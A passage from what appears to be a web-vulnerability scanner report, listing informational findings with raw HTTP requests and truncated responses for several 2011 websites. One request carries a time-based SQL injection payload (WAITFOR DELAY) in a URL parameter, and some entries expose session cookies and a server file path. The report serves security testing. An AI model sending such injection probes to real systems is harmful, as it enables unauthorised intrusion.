Date: Mon, 25 Apr 2011 18:59:14 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2342
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.101. https://support.trust-guard.com/visitor/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/index.php

Request

GET /visitor/index.php?_m=1;WAITFOR%20DELAY%20%270:0:25%27--&_a=htmlcode&departmentid=0&fullname=Smith&email=netsparker@example.com HTTP/1.1
Referer: https://support.trust-guard.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:06:17 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 126

<br />
<b>Fatal error</b>: in <b>/homepages/9/d212015129/htdocs/support/includes/functions.php</b> on line <b>867</b><br />
33.102. http://www.igotyouremail.com/igye_conversion.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igotyouremail.com
Path:   /igye_conversion.php

Request

GET /igye_conversion.php?pg=Website%20Development%20%7C%20Web%20Content%20Management%20%7C%20CMS%20%7C%20Web%20Design%20%7C%20New%20Jersey%20Custom%20Website%20Development%20%7C%20New%20Jersey%20Website%20Development%20%7C%203D%20Animation%20%7C%20Medical%20Animation&ref=&url=http%3A//www.tresware.com/&gl=&vl=0&s=null&q=null HTTP/1.1
Host: www.igotyouremail.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 12:18:24 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 07 Dec 2010 21:27:20 GMT
ETag: "31f063e-3c8-496d8ab6d1e00"
Accept-Ranges: bytes
Content-Length: 968
Connection: close
Content-Type: text/html

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at kelmarkfurnishings.com
</ADDRESS>
</B
...[SNIP]...
33.103. http://www.myreputationmanager.com/phpinfo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myreputationmanager.com
Path:   /phpinfo.php

Request

GET /phpinfo.php HTTP/1.1
Host: www.myreputationmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=181295291.1303691653.1.1.utmgclid=CNrfy-W1tqgCFYje4AodAk7yCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=181295291.1597869074.1303691653.1303691653.1303747431.2; __utmc=181295291; __utmb=181295291.4.10.1303747431

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 16:24:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html><head>
<style type="text/css">
body {background-color: #ffffff; color: #000000;}
body, td, th, h1, h
...[SNIP]...
33.104. http://www.praetorian.com/contactus.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.praetorian.com
Path:   /contactus.html

Request

GET /contactus.html HTTP/1.1
Host: www.praetorian.com
Proxy-Connection: keep-alive
Referer: http://www.praetorian.com/external-network-penetration-test.html?gclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116139463.1303735969.2.2.utmgclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=116139463.239124078.1303732836.1303732836.1303735969.2; __utmc=116139463; __utmb=116139463.1.10.1303735969

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:09:55 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 17907
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
33.105. http://www.praetorian.com/external-network-penetration-test.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.praetorian.com
Path:   /external-network-penetration-test.html

Request

GET /external-network-penetration-test.html?gclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ HTTP/1.1
Host: www.praetorian.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116139463.1303732836.1.1.utmgclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=116139463.239124078.1303732836.1303732836.1303732836.1; __utmc=116139463

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:52:37 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 13262
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
   
...[SNIP]...
33.106. http://www.praetorian.com/images/fieldbg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.praetorian.com
Path:   /images/fieldbg.gif

Request

GET /images/fieldbg.gif HTTP/1.1
Host: www.praetorian.com
Proxy-Connection: keep-alive
Referer: http://www.praetorian.com/contactus.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116139463.1303735969.2.2.utmgclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=116139463.239124078.1303732836.1303732836.1303735969.2; __utmc=116139463; __utmb=116139463.1.10.1303735969

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 13:09:56 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1317
Connection: close
Content-Type: text/html

<HTML>
   <HEAD><TITLE>Page Not Found</TITLE></HEAD>

   <BODY BGCOLOR="#FFFFFF" LINK="maroon" VLINK="maroon"
ALINK="maroon">
   <CENTER>
   <TABLE WIDTH="85%" BORDER="1" BORDERCOLOR="#000000"
CELLSPACING="
...[SNIP]...
33.107. http://www.reputationchanger.com/rc.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reputationchanger.com
Path:   /rc.ico

Request

GET /rc.ico HTTP/1.1
Host: www.reputationchanger.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 16:06:25 GMT
Server: Apache
Last-Modified: Wed, 09 Mar 2011 16:06:18 GMT
ETag: "7e5238-3c7-49e0ee8b8d280"
Accept-Ranges: bytes
Content-Length: 967
Connection: close
Content-Type: text/html

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at reputationchanger.com
</ADDRESS>
</BO
...[SNIP]...
33.108. http://www.reputationprofessor.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reputationprofessor.com
Path:   /

Request

GET / HTTP/1.1
Host: www.reputationprofessor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Behavior
Date: Mon, 25 Apr 2011 16:03:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7e mod_auth_pgsql/2.0.3
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html
Content-Length: 887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--< html xmlns="http://www.w3.org/1999/xhtml">-->
<head>
<title>HTTP Error 4
...[SNIP]...
33.109. https://www.salesforce.com/servlet/servlet.WebToLead  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.salesforce.com
Path:   /servlet/servlet.WebToLead

Request

POST /servlet/servlet.WebToLead?encoding=UTF-8 HTTP/1.1
Host: www.salesforce.com
Connection: keep-alive
Referer: http://www.reputationchanger.com/
Cache-Control: max-age=0
Origin: http://www.reputationchanger.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_vi=[CS]v1|26D8CEE5051D3246-60000107A001D614[CE]
Content-Length: 198

oid=00DC0000000Piy3&retURL=http%3A%2F%2Fwww.reputationchanger.com%2Fscheduled.html&lead_source=Website&first_name=2&last_name=2&email=2&phone=2333333333&description=2&imageField.x=75&imageField.y=45

Response

HTTP/1.1 200 OK
Server: SFDC
Is-Processed: true
Content-Type: text/html
Date: Mon, 25 Apr 2011 16:06:10 GMT
Content-Length: 444

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<meta http-equiv="Refresh" content="0; URL=http://www.reputationchanger.com/s
...[SNIP]...
33.110. http://www.smpone.com/javascript/common.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /javascript/common.php

Request

GET /javascript/common.php HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.1.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733867

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 5596

/*************************************************
   . Copyright 2006 - 2009 Tres Media Group, Inc.
   The code contained within cannot be reproduced
   or modified without the expressed permission o
...[SNIP]...
33.111. http://www.smpone.com/javascript/image_pop.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /javascript/image_pop.php

Request

GET /javascript/image_pop.php HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.1.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733867

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 2298

// <a href="me.jpg" onclick="return popImage(this.href,'Site author');">link</a>

//really not important (the first two should be small for Opera's sake)
PositionX = 10;
PositionY = 10;
defaultWi
...[SNIP]...
33.112. http://www.smpone.com/javascript/showimages.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /javascript/showimages.php

Request

GET /javascript/showimages.php HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.1.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733867

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 317

function showimage() {
   if (!document.images)
       return
       document.images.avatar.src= 'images/Avatars/' + document.Register.av_avatar_pre.options[document.Register.av_avatar_pre.selectedIndex].value
...[SNIP]...
33.113. http://www.tresware.com/javascript/bbcode.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /javascript/bbcode.php

Request

GET /javascript/bbcode.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 2394

function x() {
   return;
}

var thisForm;

function mozWrap(txtarea, lft, rgt, pmt, pmr) {
   var selLength = txtarea.textLength;
   var selStart = txtarea.selectionStart;
   var selEnd = txtarea.se
...[SNIP]...
33.114. http://www.tresware.com/javascript/common.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /javascript/common.php

Request

GET /javascript/common.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 1364

/*************************************************
   . Copyright 2006 - 2008 Tres Media Group, Inc.
   The code contained within cannot be reproduced
   or modified without the expressed permission of:
   Tr
...[SNIP]...
33.115. http://www.tresware.com/javascript/edittags.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /javascript/edittags.php

Request

GET /javascript/edittags.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 1561

adminbuttonsFlag = false;
function adminbuttons() {

   var divareas = document.getElementsByTagName('button');
   var editbuttons = new Array();
   for(var i in divareas) {
       if(divareas[i].id) {


...[SNIP]...
33.116. http://www.tresware.com/javascript/image_pop.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /javascript/image_pop.php

Request

GET /javascript/image_pop.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 2298

// <a href="me.jpg" onclick="return popImage(this.href,'Site author');">link</a>

//really not important (the first two should be small for Opera's sake)
PositionX = 10;
PositionY = 10;
defaultWi
...[SNIP]...
33.117. http://www.tresware.com/javascript/showimages.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /javascript/showimages.php

Request

GET /javascript/showimages.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 317

function showimage() {
   if (!document.images)
       return
       document.images.avatar.src= 'images/Avatars/' + document.Register.av_avatar_pre.options[document.Register.av_avatar_pre.selectedIndex].value
...[SNIP]...
34. HTML uses unrecognised charset  previous  next
There are 7 instances of this issue:

34.1. http://b2bcontext.ru/services/advertisement/getblock  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://b2bcontext.ru
Path:   /services/advertisement/getblock

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /services/advertisement/getblock?17723897 HTTP/1.1
Host: b2bcontext.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:47:19 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 30189

var b2bctb_id_12402960=b2bctb_rand;var keyg_12402960=new Array();var keyb_12402960=new Array();var b2b_check_urls_dim=[{id:4,atr:"iuuq;00xnnbjm/sv"},{id:8,atr:"iuuq;00xxx/xnnbjm/sv"},{id:12,atr:"iuuq;
...[SNIP]...
34.2. http://ideco-software.ru/products/ims/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://ideco-software.ru
Path:   /products/ims/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /products/ims/?utm_source=dir&utm_medium=cpc&utm_campaign=d1010_mail1&utm_term=mail_ics2&utm_content=10013 HTTP/1.1
Host: ideco-software.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 14:35:59 GMT
Server: Microsoft-IIS/6.0
Connection: Close
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: dv=4/25/2011 6:35:59 PM; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: Query=/products/ims/index.html?utm_source=dir&utm_medium=cpc&utm_campaign=d1010_mail1&utm_term=mail_ics2&utm_content=10013; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: FirstVisit=4/25/2011 6:35:59 PM; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fkdyl055c3sg0uuma045oy45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=windows-1251
Content-Length: 21815

<html><!-- #BeginTemplate "/Templates/main.dwt" --><!-- DW6 -->
<head>
<script type="text/javascript" src="/dropmenu/jquery.js" />
</script>
